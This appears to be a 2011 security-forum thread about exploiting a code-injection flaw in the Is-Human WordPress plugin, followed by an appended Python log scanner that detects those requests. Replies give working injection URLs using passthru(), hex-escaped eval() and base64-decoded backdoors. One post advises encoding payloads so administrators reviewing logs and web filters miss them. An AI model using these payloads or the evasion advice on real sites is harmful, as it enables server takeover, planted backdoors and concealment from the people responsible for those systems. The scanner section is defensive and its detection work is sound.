
Wordpress plugin exploit


jonas

Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Fri Jul 22, 2011 5:38 am

Wordpress plugin exploit

Hi,
I'm playing around with my WordPress installation trying out various exploits found on exploit-db. However, I'm pretty new to pentesting web applications.

I'm trying out this:  http://www.exploit-db.com/exploits/17299/

Running "http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(ipconfig);error" gives me the ipconfig of the local machine no problems.

However, I would like to get spacing in there. I tried URL encoding (like ipconfig%20/all) but that didn't seem to work. I'd like to do "dir C:\" for example. Also, could I run other types of code in there to upload a PHP backdoor, or connect and download it from FTP to the webroot or similar?

Any help please?

Error message using URL encoding:

Deprecated: Function set_magic_quotes_runtime() is deprecated in C:\xampp\htdocs\wp-settings.php on line 32
Array
Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: error_log() expects at least 1 parameter, 0 given in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Data_Raid

Full Member

Posts: 165

Joined: Fri Nov 09, 2007 5:55 am

Post Fri Jul 22, 2011 6:40 am

Re: Wordpress plugin exploit

I'm no expert but ..... would $nbsp; work?

  Code:
(ipconfig$nbsp;/all)
All men by nature desire knowledge.

Aristotle

hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Fri Jul 22, 2011 11:59 am

Re: Wordpress plugin exploit

I'm also guessing (not sitting by a machine to try it, right the moment) that it doesn't like the / character, and you might need to encode that, as well, if simply using the %20 for the space doesn't work.

Part of your error info lends to my thinking, too:

"Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1"

It's misinterpreting the / as a division, and turning your whole command into gibberish:

"Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1"
Last edited by hayabusa on Fri Jul 22, 2011 12:12 pm, edited 1 time in total.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH

MaXe

Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Fri Jul 22, 2011 12:23 pm

Re: Wordpress plugin exploit

If you can execute PHP successfully like this:
http://localhost/wp-content/plugins/is- ... h_options();passthru(ipconfig);error

Just use input like this:
http://localhost/wp-content/plugins/is- ... h_options();eval("\x41\x41\x41");error

(Those hexadecimal A's being PHP CODE that should be executed. So within eval, write passthru("IP Config") and then ENCODE it. It's very important you encode it.)

An alternative way, is:
http://localhost/wp-content/plugins/is- ... h_options();eval(base64_decode("t00wt00w"));error

Where "t00wt00w" is a base64 encoded backdoor.

Need help? Try HaXxd00r (you may encounter encoding errors fyi!)

Reference: www.intern0t.net/haxxd00r
(Yes, it's free to use and it's only for educational purposes etc.)


Edit:
IF you're already within an eval() statement, you should avoid using eval() again. It may not work as intended. But feel free to try.

You could try something like this:
http://localhost/wp-content/plugins/is- ... h_options();base64_decode("t00wt00w");error

Where "t00wt00w" is a base64 encoded backdoor or whatever you want. Have fun!  ;D
Last edited by MaXe on Fri Jul 22, 2011 12:25 pm, edited 1 time in total.
I'm an InterN0T'er

hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Fri Jul 22, 2011 12:29 pm

Re: Wordpress plugin exploit

MaXe has a good point, and beat me to it. I was about to reply again and simply suggest that best practice would be to encode the whole string anyway.

Multiple reasons:

1.) gets you past errors like you hit

2.) less chance that an admin reviewing a log would have a clue what it was you actually did

3.) gets you past other web filtering solutions they might have in place.

4.) it's way cooler anyway  :P
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH

MaXe

Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Sat Jul 23, 2011 1:07 pm

Re: Wordpress plugin exploit

hayabusa wrote: Multiple reasons: (for encoding a payload - MaXe)

1.) gets you past errors like you hit

2.) less chance that an admin reviewing a log would have a clue what it was you actually did

3.) gets you past other web filtering solutions they might have in place.

4.) it's way cooler anyway  :P


Quoted for Truth!  ;D
I'm an InterN0T'er

jonas

Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Sun Jul 24, 2011 3:19 pm

Re: Wordpress plugin exploit

Hehe. Absolutely way cooler in hex!! ;)  I really appreciate the feedback!
I will be testing this at work tomorrow and tell you how it went!
Much obliged!

jonas

Newbie

Posts: 46

Joined: Mon Jun 08, 2009 9:04 pm

Post Mon Jul 25, 2011 3:54 am

Re: Wordpress plugin exploit

Hi again guys,
I tried the stuff you said and I'm somewhat convinced this should work! However, it doesn't! It's most likely me doing something wrong...

I tried a lot of stuff like (ipconfig):

http://localhost/wp-content/plugins/is- ... h_options();passthru("\x65\x72\x72\x6f\x72\x5f\x72\x65\x70\x6f\x72\x74\x69\x6e\x67\x28\x30\x29\x3b\x65\x63\x68\x6f\x20\x40\x69\x6e\x63\x6c\x75\x64\x65\x28\x24\x5f\x50\x4f\x53\x54\x5b\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x5d\x29\x3b");error

Tried both POST/GET just to check it out.
I also tried various variants of the base64 with different function calls.
Errors are turned off.

Most of the time I'm getting this error message:

Parse error: syntax error, unexpected '"', expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Removing apostrophes gives me:
Parse error: syntax error, unexpected T_NS_SEPARATOR, expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Any clues? 
Btw, that "HaXxd00r" was pure awesomeness =)

MaXe

Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Mon Jul 25, 2011 12:58 pm

Re: Wordpress plugin exploit

I'm not sure if passthru() accepts that kind of input, even though it should, but then again.. It takes arguments and executes them as commands on the target operating system, so if it doesn't convert the input, then an error would be returned.

Try: passthru(base64_decode("bHMgLWFs"))
Or: passthru(base64_decode('bHMgLWFs'))
(This should execute an "ls -al" command, note there's a space included.)

For that kind of hexadecimal input, you will _always_ need to encapsulate the input in quotes " in most cases; using apostrophes ' may not work, even though it should!  ;D (I think I encountered a problem like this once, a long time ago, not 100% sure since it should be the same, in most cases where variables and other special characters are not used.)

Note:
Hmm, but after thinking about the first error for a while, the error could be caused by your use of ", and you should try to use ' instead. I know it sounds strange, but all I can do is guess when I don't have the source code of that engine.php script  :)
I'm an InterN0T'er
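Added example, not from the thread or from any of the posters: a small Python log scanner that picks up hayabusa's point that encoded payloads are harder to spot in a log, and MaXe's base64_decode() and \xNN variants. It URL-decodes the is-human `type` parameter from access-log lines, flags injected statements, and undoes the hex and base64 obfuscation so a reviewer sees the real argument. The log lines are constructed; only the engine.php path and the `type` parameter name come from the thread, and nothing about the plugin's real source is assumed.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the thread): a benign
# is-human request, the plain payload the thread starts from, a hex-escaped
# eval() variant, a base64_decode() variant, and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jul/2011:05:38:01 +0000] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options() HTTP/1.1" 200 12
10.0.0.9 - - [22/Jul/2011:05:38:07 +0000] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(ipconfig);error HTTP/1.1" 200 812
10.0.0.9 - - [22/Jul/2011:12:30:44 +0000] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options()%3Beval(%22%5Cx41%5Cx41%22)%3Berror HTTP/1.1" 500 0
10.0.0.9 - - [23/Jul/2011:13:07:10 +0000] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options()%3Bpassthru(base64_decode(%22bHMgLWFs%22))%3Berror HTTP/1.1" 200 300
10.0.0.5 - - [22/Jul/2011:05:40:00 +0000] "GET /index.php HTTP/1.1" 200 5000
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# PHP calls that have no business inside a plugin's query-string parameter.
SUSPECT_CALLS = ("passthru(", "eval(", "base64_decode(", "system(", "shell_exec(")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
B64_ARG = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")

def query_params(url):
    """URL-decode the query string by hand: older urllib.parse.parse_qs also
    splits on ';', which would hide the injected statements."""
    return {unquote(k): unquote(v) for k, _, v in
            (pair.partition("=") for pair in url.partition("?")[2].split("&"))}

def analyze(line):
    """Return a finding for a suspicious is-human engine.php request, else None."""
    m = LOG_RE.match(line)
    if not m or "/plugins/is-human/engine.php" not in m.group(2):
        return None
    value = query_params(m.group(2)).get("type", "")
    reasons = ["statement separator in type="] if ";" in value else []
    reasons += [call for call in SUSPECT_CALLS if call in value.lower()]
    if HEX_ESCAPE.search(value):
        reasons.append("hex-escaped string")
    if not reasons:
        return None
    # Undo the obfuscations discussed in the thread: \xNN escapes and base64_decode("...").
    revealed = HEX_ESCAPE.sub(lambda h: chr(int(h.group(1), 16)), value)
    for b64 in B64_ARG.findall(value):
        try:
            revealed += " [base64 -> %s]" % base64.b64decode(b64).decode("utf-8", "replace")
        except ValueError:
            revealed += " [base64 -> undecodable]"
    return {"ip": m.group(1), "type": value, "revealed": revealed, "reasons": reasons}

def scan_log(text):
    """Run analyze() over every line and keep the findings."""
    return [f for f in map(analyze, text.splitlines()) if f]
```

Run `scan_log(SAMPLE_LOG)` to get three findings: the plain passthru() call, the eval() with its "\x41\x41" revealed as "AA", and the base64 argument revealed as "ls -al".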
